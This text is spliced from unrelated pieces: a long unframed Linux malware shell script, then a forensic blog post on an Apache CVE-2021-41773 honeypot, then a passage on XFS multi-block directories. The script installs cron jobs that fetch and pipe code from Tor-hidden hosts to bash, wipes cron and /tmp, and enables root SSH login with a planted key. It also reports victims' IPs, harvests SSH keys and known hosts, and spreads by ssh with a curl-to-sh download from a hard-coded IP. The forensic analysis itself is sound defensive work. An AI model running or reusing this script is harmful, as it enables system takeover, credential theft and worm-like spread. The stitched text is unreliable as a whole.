                CRON11="WGET_OPTS=\"--quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75\";(wget \${WGET_OPTS} https://${RHOST}${TOR1}src/ldm || wget \${WGET_OPTS} https://${RHOST}${TOR2}src/ldm || wget \${WGET_OPTS} https://${RHOST}${TOR3}src/ldm)|bash"
        fi

        C1=$(echo -e "$CS""\n""$CR""\n""* * * * * $CRON11")
        C2=$(echo -e "$CS""\n""$CR""\n""* * * * * root $CRON11")
}

net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip || ${wget} ${WOPTS} -O - ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
    unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
    http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi

if [ ${sudoer} -eq 1 ]; then
    if [ -f /etc/ld.so.preload ]; then
        if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi
        ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
        >/tmp/.ld.so >/dev/null 2>&1
        ${sudo} ${rm} -rf /etc/ld.so.preload* >/dev/null 2>&1
    fi

    if [ -d /etc/systemd/system/ ]; then ${sudo} ${rm} -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
    [ $(${sudo} cat /etc/hosts|grep -i "onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i "tor2web."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.tor2web.$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i "onion.\|tor2web"|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
    if [ -f /usr/bin/yum ]; then
        if [ -f /usr/bin/systemctl ]; then
            crstart="systemctl restart crond.service >/dev/null 2>&1"
            crstop="systemctl stop crond.service >/dev/null 2>&1"
        else
            crstart="/etc/init.d/crond restart >/dev/null 2>&1"
            crstop="/etc/init.d/crond stop >/dev/null 2>&1"
        fi
    elif [ -f /usr/bin/apt-get ]; then
        crstart="service cron restart >/dev/null 2>&1"
        crstop="service cron stop >/dev/null 2>&1"
    elif [ -f /usr/bin/pacman ]; then
        crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"
        crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"
    elif [ -f /sbin/apk ]; then
        crstart="/etc/init.d/crond restart >/dev/null 2>&1"
        crstop="/etc/init.d/crond stop >/dev/null 2>&1"
    fi
    if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(${wget} --version 2>/dev/null|wc -l) -eq 0 ]; then
        if [ -f /usr/bin/yum ]; then
            yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1
            yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1
            chkconfig sshd on >/dev/null 2>&1
            chkconfig crond on >/dev/null 2>&1;
            if [ -f /usr/bin/systemctl ]; then
                systemctl start sshd.service >/dev/null 2>&1
            else
                /etc/init.d/sshd start >/dev/null 2>&1
            fi
        elif [ -f /usr/bin/apt-get ]; then
            rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)
            if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
            ${sudo} systemctl enable ssh
            ${sudo} systemctl enable cron
            ${sudo} /etc/init.d/ssh restart >/dev/null 2>&1
        elif [ -f /usr/bin/pacman ]; then
            pacman -Syy >/dev/null 2>&1
            pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1
            systemctl enable --now cronie.service >/dev/null 2>&1
            systemctl enable --now sshd.service >/dev/null 2>&1
            /etc/rc.d/sshd restart >/dev/null 2>&1
        elif [ -f /sbin/apk ]; then
            #apk --no-cache -f upgrade >/dev/null 2>&1
            apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1
            apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;
            apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1
            rc-update add sshd >/dev/null 2>&1
            /etc/init.d/sshd start >/dev/null 2>&1
            if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi
        fi
    fi

        if [ $(curl --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="curl"; elif [ $(lxc --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then curl="lxc"; else curl="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi "Dump libcurl equivalent" && curl="$f" && ${sudo} mv -f $curl ${bpath}/lxc && break; done; fi
        if [ $(wget --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="wget"; elif [ $(lxw --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then wget="lxw"; else wget="echo"; for f in ${bpath}/*; do strings $f 2>/dev/null|grep -qi ".wgetrc'-style command" && wget="$f" && ${sudo} mv -f $wget ${bpath}/lxw && break; done; fi
        net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip || ${wget} ${WOPTS} -O - ipinfo.io/ip)
        cik >/dev/null 2>&1

    ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
    ${sudo} ${rm} -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} ${rm} -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} ${rm} -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} ${rm} -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.d/.* >/dev/null 2>&1;
    ${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1
    ${sudo} ${rm} -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} ${rm} -rf /etc/cron.daily/.* >/dev/null 2>&1;
    ${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} ${rm} -rf /tmp/* >/dev/null 2>&1; ${sudo} ${rm} -rf /tmp/.* >/dev/null 2>&1
    ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1
    if [ -f /sbin/apk ]; then
        ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1
        ${sudo} ${rm} -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root
    elif [ -f /usr/bin/apt-get ]; then
        ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} chmod 600 /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi
    else
        ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi
    fi
    ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)
    if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi
    ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
    rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1 && ${sudo} chmod 600 /etc/cron.d/root 2>&1)
    if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct
        if [ -f ${LPATH}.${rm} ] && [ -f ${LPATH}.ct ]; then
            ${sudo} "${crstop}"
            cd=$(which crond)
            ct=$(which crontab)
            if [ -n "${ct}" ]; then ${sudo} ${LPATH}.${rm} ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
            ${sudo} "${crstart}"
        fi
    fi

    ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1;

        [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }
    touch "${LPATH}.sysud"
else
    if [ $(which crontab|wc -l) -ne 0 ]; then
                cik >/dev/null 2>&1
        crontab -r >/dev/null 2>&1
        (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
    fi
fi

localk() {
        KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
        KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
        KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
        HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
        HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
        HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
        USERZ=$(
                echo "root"
                find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
        )
        userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
        for user in $userlist; do
                for host in $hostlist; do
                        for key in $keylist; do
                                chmod +r $key; chmod 400 $key
                                ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl http://34.221.40.237/.x/3sh||wget -q -O- http://34.221.40.237/.x/1sh)|sh" >/dev/null 2>&1 &
                        done
                done
        done
}


sockz >/dev/null 2>&1

${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1
if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
if [ "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}" ]; then
        ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys;
        if [ -n "${net}" ]; then
                (${curl} ${COPTS} -x socks5h://$s:9050 "${RHOST}.onion/rsl.php?ip=${net}&login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR1}rsl.php?ip=${net}&login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR2}rsl.php?ip=${net}&login=$(whoami)" || ${curl} ${COPTS} "https://${RHOST}${TOR3}rsl.php?ip=${net}&login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR1}rsl.php?ip=${net}&login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR2}rsl.php?ip=${net}&login=$(whoami)" || ${wget} ${WOPTS} -O - "https://${RHOST}${TOR3}rsl.php?ip=${net}&login=$(whoami)") >/dev/null 2>&1 &
        fi
fi

${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1

${rm} -rf ./main* >/dev/null 2>&1
${rm} -rf ./*.ico* >/dev/null 2>&1
${rm} -rf ./r64* >/dev/null 2>&1
${rm} -rf ./r32* >/dev/null 2>&1
[ $(echo "$0"|grep -i ".cache\|bin"|wc -l) -eq 0 ] && [ "$1" != "" ] && { ${rm} -f "$0" >/dev/null 2>&1; }
echo -e '\n'
if [ -f "${LPATH}.mud" ]; then mudTime=$(find "${LPATH}.mud" -mmin +9); if [ ${mudTime-".mud"} != "" ]; then ${rm} -f "${LPATH}.mud" >/dev/null 2>&1; fi; fi

r=${net}_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})

if [ $(command -v timeout|wc -l) -ne 0 ]; then
        timeout 300 $(command -v bash) -c "(${curl} ${COPTS} -x socks5h://$s:9050 ${RHOST}.onion/src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR1}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR2}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR3}src/main -e$r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR1}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR2}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR3}src/main --referer $r)|${sudo} $(command -v bash)" >/dev/null 2>&1 &
else
        (${curl} ${COPTS} -x socks5h://$s:9050 ${RHOST}.onion/src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR1}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR2}src/main -e$r || ${curl} ${COPTS} https://${RHOST}${TOR3}src/main -e$r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR1}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR2}src/main --referer $r || ${wget} ${WOPTS} -O - https://${RHOST}${TOR3}src/main --referer $r)|${sudo} $(command -v bash) >/dev/null 2>&1 &
fi

localk >/dev/null 2>&1

Hudak’s Honeypot (Part 1)

Recently Tyler Hudak (@SecShoggoth) tweeted:

Oh Tyler, you had me at #Ubuntu! Tyler provided a link to the files and I grabbed them. Here’s the included readme.txt, just to set the scene:

This Ubuntu Linux honeypot was put online in Azure in early October with the sole purpose of watching what happens with those exploiting CVE-2021-41773.

Initially there was a large amount of cryptominers that hit the system. You will see one cron script that is meant to remove files named kinsing in /tmp. This was my way of preventing these miners so more interesting things could occur.

Then, as with many things, I got busy and forgot about it. Fast forward to now (early December) and I remembered it was still up. I logged on and saw CPU usage through the roof. Instead of just shutting it down, I grabbed a disk snapshot, memory snapshot, and ran a tool named UAC (https://github.com/tclahr/uac) to grab live response. The results of this are in this directory.

There are three files:

- sdb.vhd.gz - VHD of the main drive obtained through an Azure disk snapshot
- ubuntu.20211208.mem.gz - Dump of memory using Lime
- uac.tgz - Results of UAC running on the system

Items were obtained in the order above - drive was snapshotted, memory was grabbed, then UAC was run.

Please feel free to share this. All I ask is that if you do any analysis to share it with the community.

If anyone would like to offer a more permanent home for the files, please let me know.

Thanks!

Tyler Hudak

Before going any farther, I wanted to find the cron job that Tyler mentions just so I wouldn’t be confused by his cleanup tool versus actual intruder activity. There is an entry in /var/spool/cron/crontabs/root that invokes /root/.remove.sh every minute. /root/.remove.sh is simple enough:

#!/bin/bash

for PID in `ps -ef | egrep "kinsing|kdevtmp" | grep "/tmp"  | awk '{ print $2 }'`
do
        kill -9 $PID
done

chown root.root /tmp/k*
chmod 444 /tmp/k*

We find a large number of /tmp/kinsing_* files and a couple of /tmp/kdevtmp* files. I did a quick verification that these were Kinsing and XMRig coin miners respectively, and then forgot all about them. There’s much more interesting stuff to look at in this image!

Other Strange Files in [/var]/tmp

While looking at Tyler’s cron job and its impact on the system, I couldn’t help noticing a couple of other interesting artifacts in the /tmp and /var/tmp directories.

  • /var/tmp/dk86 was created 2021-11-11 19:09:51 UTC. The file is owned by user “daemon”–unsurprisingly, this is the user the web server on the machine runs as. I’ll dive into this file in more detail in a future blog post.
  • /tmp/Mozi.a and /tmp/Mozi.tm were both created on 2021-10-13. Mozi.a has a creation time of 13:45:20 and is owned by the root user. Mozi.tm appears at 13:45:48 and is owned by “azureuser” (UID 1000). Looking at /home/azureuser/.bash_history, I think these files were intentionally created by Tyler during some of his early research into ongoing attacks on the machine (correct me if I’m wrong, Tyler!). So I chose to ignore them.

Looking into UAC

I’ve never used the UAC tool before, so I decided to start my investigation with that data and see how much useful information I could extract. The short answer is I found it very useful, particularly the process information collected by the tool in the …/liveresponse/process output directory.

lsof is one of my favorite Linux forensic tools, so I started with the “lsof_-nPl.txt” file. In particular, I started by looking at the current working directories of processes, for ones that looked abnormal. Here’s a subset of the output:

# grep cwd lsof_-nPl.txt | grep -v '2 /'
cron       1029              0  cwd       DIR               8,17     4096      68440 /var/spool/cron
bash       4205           1000  cwd       DIR               8,17     4096     527081 /home/azureuser/src/LiME/src
sleep      6388              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
uac        6445              0  cwd       DIR               8,17     4096     528610 /root/uac
uac        7755              0  cwd       DIR               8,17     4096     528610 /root/uac
lsof       7978              0  cwd       DIR               8,17     4096     528610 /root/uac
lsof       7984              0  cwd       DIR               8,17     4096     528610 /root/uac
sudo       9303              0  cwd       DIR               8,17     4096     527081 /home/azureuser/src/LiME/src
su         9314              0  cwd       DIR               8,17     4096     527081 /home/azureuser/src/LiME/src
bash       9331              0  cwd       DIR               8,17     4096     528610 /root/uac
sh        15853              1  cwd       DIR               8,17    12288       4059 /tmp
sh        20645              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        21785              1  cwd       DIR               8,17    12288       4059 /tmp
python3   27968              0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28623        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28625        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28627        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2
python3   27968 28630        0  cwd       DIR               8,17     4096    1552795 /var/lib/waagent/WALinuxAgent-2.5.0.2

PIDs 20645 and 6388 are running from the deleted /var/tmp/.log/101068/.spoollog directory, so they are immediately of interest. I also noted shell processes– PIDs 15853 and 21785– running from /tmp. That also looks a bit strange to me. Note that all of the suspicious processes are running as UID 1, the “daemon” user (see /etc/passwd from the system disk image to confirm).

What else is running as “daemon”? Let’s take a look at the “ps_-ef.txt” file created by UAC:

# awk '$1 == "daemon"' ps_-ef.txt
daemon    1003     1  0 Oct09 ?        00:00:00 /usr/sbin/atd -f
daemon    1693   801  0 Nov18 ?        00:00:48 /usr/sbin/httpd -k start
daemon    1813   801  0 Nov18 ?        00:00:40 /usr/sbin/httpd -k start
daemon    2539   801  0 Nov18 ?        00:00:39 /usr/sbin/httpd -k start
daemon    2632   801  0 Nov18 ?        00:01:23 /usr/sbin/httpd -k start
daemon    6388 20645  0 18:50 ?        00:00:00 sleep 300
daemon    6803 21785  0 18:51 ?        00:00:00 sleep 30
daemon    6830 15853  0 18:51 ?        00:00:00 sleep 30
daemon   15851     1  0 Nov30 ?        00:00:00 /bin/bash
daemon   15853 15851  0 Nov30 ?        00:25:04 sh
daemon   20645     1  0 Nov14 ?        03:01:59 sh .src.sh
daemon   21783     1  0 Nov30 ?        00:00:00 /bin/bash
daemon   21785 21783  0 Nov30 ?        00:25:02 sh
daemon   24330     1 49 Dec05 ?        1-16:41:54 agettyd -c noresetd

We see the web server on the system running as “daemon”. Unless the attackers bring along a privilege escalation tool, it’s likely their exploits are going to end up running as this user. /usr/sbin/atd running as “daemon” is typical for this Linux, so I’ll ignore that process. But there’s an interesting story being told by the other processes in the above listing.

On November 14, PID 20645 starts PID 6388 (observe the PPID on PID 6388). These were the processes we saw above that were running from the deleted /var/tmp/.log/101068/.spoollog directory. Also note that PID 20645 was apparently started as “sh .src.sh” which is definitely a suspicious command line.

UAC also captures some data from /proc for each process. The …/proc/20645/environ.txt file has some interesting details. I’ve extracted and reordered the most interesting data below:

REMOTE_ADDR=116.202.187.77
REMOTE_PORT=56590
HTTP_USER_AGENT=curl/7.79.1

HOME=/var/tmp/.log/101068/.spoollog/.api
PWD=/var/tmp/.log/101068/.spoollog
OLDPWD=/var/tmp
PYTHONUSERBASE=/var/tmp/.log/101068/.spoollog/.api/.mnc

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
SCRIPT_NAME=/cgi-bin/../../../../bin/sh
SCRIPT_FILENAME=/bin/sh
CONTEXT_PREFIX=/cgi-bin/
CONTEXT_DOCUMENT_ROOT=/usr/lib/cgi-bin/

The request URI is typical of the CVE-2021-41773 RCE. We see the IP address and port used by the requestor– probably a VPN tunnel endpoint or Tor node and not the attacker’s actual IP address. We also have a user agent string which indicates that this was likely a scripted attack– curl is a command-line web client. The directories referenced in environment variables tie back to the deleted /var/tmp/.log/101068/.spoollog directory that was the CWD of these processes. So these are definitely worth digging deeper into in a future blog post.

There are two different, but very similar process hierarchies starting on Nov 30. Bash process 15851 starts sh process 15853 which runs sleep process 6830. Similarly, bash process 21783 starts shell process 21785 which runs sleep process 6803. The environ.txt files for these processes are nearly identical. PID 15851 was triggered from IP 5.2.72.226:47374, while PID 21783 was started by a request from 104.244.76.13:36748. All the other data is the same, so likely the same exploit was used–possibly by the same attacker:

HTTP_USER_AGENT=curl/7.79.1
REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash

That leaves our mysterious agetty process from Dec 5. Using the “running_processes_full_paths.txt” data dumped by UAC, you can see this process is running from the deleted /tmp/agettyd binary, which is very abnormal. But when we look at the “environ.txt” data, it’s easy to see that this process is related to the PID 15851 process hierarchy from Nov 30.

REMOTE_ADDR=5.2.72.226
REMOTE_PORT=47374
HTTP_USER_AGENT=curl/7.79.1

REQUEST_METHOD=POST
REQUEST_URI=/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash
SCRIPT_NAME=/cgi-bin/../../../../../../../bin/bash

IP address, port, user agent, and all of the details of the request match perfectly with the information related to PID 15851. Clearly we will need to drill into this in more detail in a future blog post.

Coming Soon

Based on the triage I’ve done so far, my investigation has three main threads:

  1. Where is /var/tmp/dk86 come from and what is it? (analysis in Part Two)
  2. What is the origin of the processes running from the deleted /var/tmp/.log/101068/.spoollog and how did the directory end up getting deleted? (analysis in Part Three)
  3. Can we tell if the requests from 5.2.72.226 and 104.244.76.13 independent actors or the same attacker using multiple IPs? How did the /tmp/agettyd process get created? (analysis in Part 4)

We’ll investigate these questions more deeply in upcoming blog posts.

XFS (Part 5) – Multi-Block Directories

Life gets more interesting when directories get large enough to occupy multiple blocks. Let’s take a look at my /etc directory:

[root@localhost hal]# ls -lid /etc
67146849 drwxr-xr-x. 141 root root 8192 May 26 20:37 /etc

The file size is 8192 bytes, or two 4K blocks.

Now we’ll use xfs_db to get more information:

xfs_db> inode 67146849
xfs_db> print
[...]
core.size = 8192
core.nblocks = 3
core.extsize = 0
core.nextents = 3
[...]
u3.bmx[0-2] = [startoff,startblock,blockcount,extentflag] 
0:[0,8393423,1,0] 
1:[1,8397532,1,0] 
2:[8388608,8394766,1,0]
[...]

I’ve removed much of the output here to make things more readable. The directory file is fragmented, requiring multiple single-block extents, which is common for directories in XFS. The directory would start as a single block. Eventually enough files will be added to the directory that it needs more than one block to hold all the file entries. But by this time, the blocks immediately following the original directory block have been consumed– often by the files which make up the content of the directory. When the directory needs to grow, it typically has to fragment.

What is really interesting about multi-block directories in XFS is that they are sparse files. Looking at the list of extents at the end of the xfs_db output, we see that the first two blocks are at logical block offsets 0 and 1, but the third block is at logical block offset 8388608. What the heck is going on here?

If you recall from our discussion of block directories in the last installment, XFS directories have a hash lookup table at the end for faster searching. When a directory consumes multiple blocks, the hash lookup table and “tail record” move into their own block. For consistency, XFS places this information at logical offset XFS_DIR2_LEAF_OFFSET, which is currently set to 32GB. 32GB divided by our 4K block size gives a logical block offset of 8388608.

From a file size perspective, we can see that xfs_db agrees with our earlier ls output, saying the directory is 8192 bytes. However, the xfs_db output clearly shows that the directory consumes three blocks, which should give it a file size of 3*4096 = 12288 bytes. Based on my testing, the directory “size” in XFS only counts the blocks that contain directory entries.

We can use xfs_db to examine the directory data blocks in more detail:

xfs_db> addr u3.bmx[0].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xe3a7892d (correct)
dhdr.hdr.bno = 38872696
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0x220
dhdr.bestfree[0].length = 0x8
dhdr.bestfree[1].offset = 0x258
dhdr.bestfree[1].length = 0x8
dhdr.bestfree[2].offset = 0x368
dhdr.bestfree[2].length = 0x8
du[0].inumber = 67146849
du[0].namelen = 1
du[0].name = "."
du[0].filetype = 2
